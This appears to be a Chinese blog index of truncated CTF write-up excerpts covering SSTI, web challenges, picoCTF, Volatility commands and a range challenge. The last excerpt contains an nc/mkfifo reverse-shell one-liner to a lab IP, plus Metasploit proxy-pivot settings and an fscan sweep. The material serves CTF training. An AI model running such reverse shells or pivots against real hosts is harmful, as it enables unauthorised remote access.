ctfshow-ssti学习
SSTI是什么SSTI,服务端模板注入,其实也就是模板引擎+注入,那么我们首先需要了解一下模板引擎 模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。 模板只是一种提供给程序来解析的一种语法,换句话说,模板是用于从数据(变量)到实际的视觉表现(HTML代码)这项工作的一种实现手段,而这种手段不论在前端还是后端都有应用。通俗点理解:拿到数据,塞到模板里,然后让渲染引擎将赛进去的东西生成 html 的文本,返回给浏览器,这样做的好处展示数据快,大大提升效率。 常见的模板引擎 123PHP: Smarty, Twig, BladeJAVA: JSP, FreeMarker, VelocityPython: Jinja2, django,...
CTFshow-第三届愚人杯web-wp
webeasy_signinhttps://ctf.show/challenges#easy_signin-3967 首先给到一个url http://f43e5622-a292-404c-98b5-85b54f0450d8.challenge.ctf.show/?img=ZmFjZS5wbmc= url后img为base64 ZmFjZS5wbmc= => face.png 那可以直接读取源码,index.php, index.php => aW5kZXgucGhw 右键查看源代码即可看到 pd9开头为<?php 直接解密即可 easy_flaskhttps://ctf.show/challenges#easy_flask-3971 打开题目连接是一个登录框,可以进行用户注册 可以参考这篇文章 https://blog.csdn.net/since_2020/article/details/119543172 随便一个用户注册,123/123登录上去,可以看到learn可以点击,查看到源代码 有一个app.secret_key =...
2023数字中国创新大赛-网络数据安全赛道-数据安全产业人才能力挑战赛-预赛wp
C2流量分析.1 EDR在一台机密计算机上检测到终止k4.exe进程的行为,取证人员取出来了该机器的镜像流量,请分析附件流量,回答对应问题。(注意:题目中的程序可能存在恶意操作,如果需要运行或调试,请在虚拟机中操作) https://pan.baidu.com/s/1ldNxI6mMfduIxjtAOSMcZQ 附件下载...
GKCTF-2021-hackme
复现地址:https://buuoj.cn/challenges#[GKCTF%202021]hackme 直接访问靶机是一个登录界面 给了提示:unicode , 注意server和其配置文件 右键查看源代码,可以看到一个注释,,这里是三个单词而不是四个,do you nosql? 什么是 NosqlNoSQL 即 Not Only SQL,意即 “不仅仅是SQL”。在现代的计算系统上每天网络上都会产生庞大的数据量。这些数据有很大一部分是由关系数据库管理系统(RDBMS)来处理。 通过应用实践证明,关系模型是非常适合于客户服务器编程,远远超出预期的利益,今天它是结构化数据存储在网络和商务应用的主导技术。 NoSQL 是一项全新的数据库革命性运动,早期就有人提出,发展至 2009 年趋势越发高涨。NoSQL的拥护者们提倡运用非关系型的数据存储,相对于铺天盖地的关系型数据库运用,这一概念无疑是一种全新的思维的注入。 什么是 MongoDBMongoDB 是当前最流行的 NoSQL 数据库产品之一,由 C++ 语言编写,是一个基于分布式文件存储的数据库。旨在为 WEB...
picoCTF-2023-部分wp
webfindme访问页面,是一个登录的页面,账号密码test/test! 抓包看到跳转到一个页面, (/images/2023picoctf/image-20230327162639364.png) 访问这个/next-page/id=cGljb0NURntwcm94aWVzX2Fs 抓包,中间又会跳转一个页面,直接跳出来一个页面,看到有一个id,好像是base64,直接拼接 flag:picoCTF{proxies_all_the_way_a0fe074f} chronoHow to automate tasks to run at intervals on linux servers? 机翻:如何自动执行任务以在 Linux 服务器上定期运行? 给了账号密码端口,直接连上去 定时任务的命令 crontab ,执行crontab -l 发现没有,crontab的文件目录在/etc/下 以cron开头, 在 challenge目录下也有flag flag:{“flag”: “picoCTF{Sch3DUL7NG_T45K3_L1NUX_1d781160}”,...
VNCTF2023
web象棋王子顾名思义,应该是下象棋的,我们可以下,太菜了,js直接翻http://236f7cc1-466c-4d47-abf8-21b4ffc92cf7.node4.buuoj.cn:81/js/play.js在play.js中 下面有jsfuck 直接复制所有,到浏览器console中,即可
volatility常用命令
参考 12https://wiki.wgpsec.org/knowledge/ctf/Volatility.html#%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4https://blog.csdn.net/u011250160/article/details/120473177 volatility2常用模块 # 插件名称 功能 amcache 查看AmCache应用程序痕迹信息 apihooks 检测内核及进程的内存空间中的API hook atoms 列出会话及窗口站atom表 atomscan Atom表的池扫描(Pool scanner) auditpol 列出注册表HKLMSECURITYPolicyPolAdtEv的审计策略信息 bigpools 使用BigPagePoolScanner转储大分页池(big page...
NSSCTF Round#8
webMyDoorhttp://43.142.108.3:28348/index.php?file=这里应该是文件读取,直接、etc/passwd...
2023hgame部分wp
week1Classic Childhood Game简单js,我们右键源代码一下,翻一翻js文件直接搜hgame 没有,那肯定时编码或者加密了,找找可疑字符串,拿去解一下 12function mota() { var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35']; webBecome A Member典型header头请求,cookie那个还挺难想的emmmm Referer: bunnybunnybunny.comX-Forwarded-For:...
2022弱口令安全实验室招新赛-靶机挑战
https://www.iculture.cc/rce/ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.128 9990 >/tmp/f setg Proxies socks5:192.168.144.128:1080 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。 setg Proxies socks5:192.168.144.136:8888 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。 :>fscan.exe -h 192.168.48.1/24fscan.exe -h 192.168.48.1/24 / _ \ ___ ___ _ __ __ _ | | __ / /// __|/ | ‘/ ` |/ | |/ // /\___ \ (| |...